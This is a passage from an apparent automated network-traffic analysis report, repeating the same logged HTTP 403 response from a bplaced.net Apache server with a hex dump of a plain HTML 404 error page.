30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:36 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=123X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:37 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=119X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:38 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=107X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:39 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=108X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:40 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=116X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:41 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=125X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:42 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=108X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 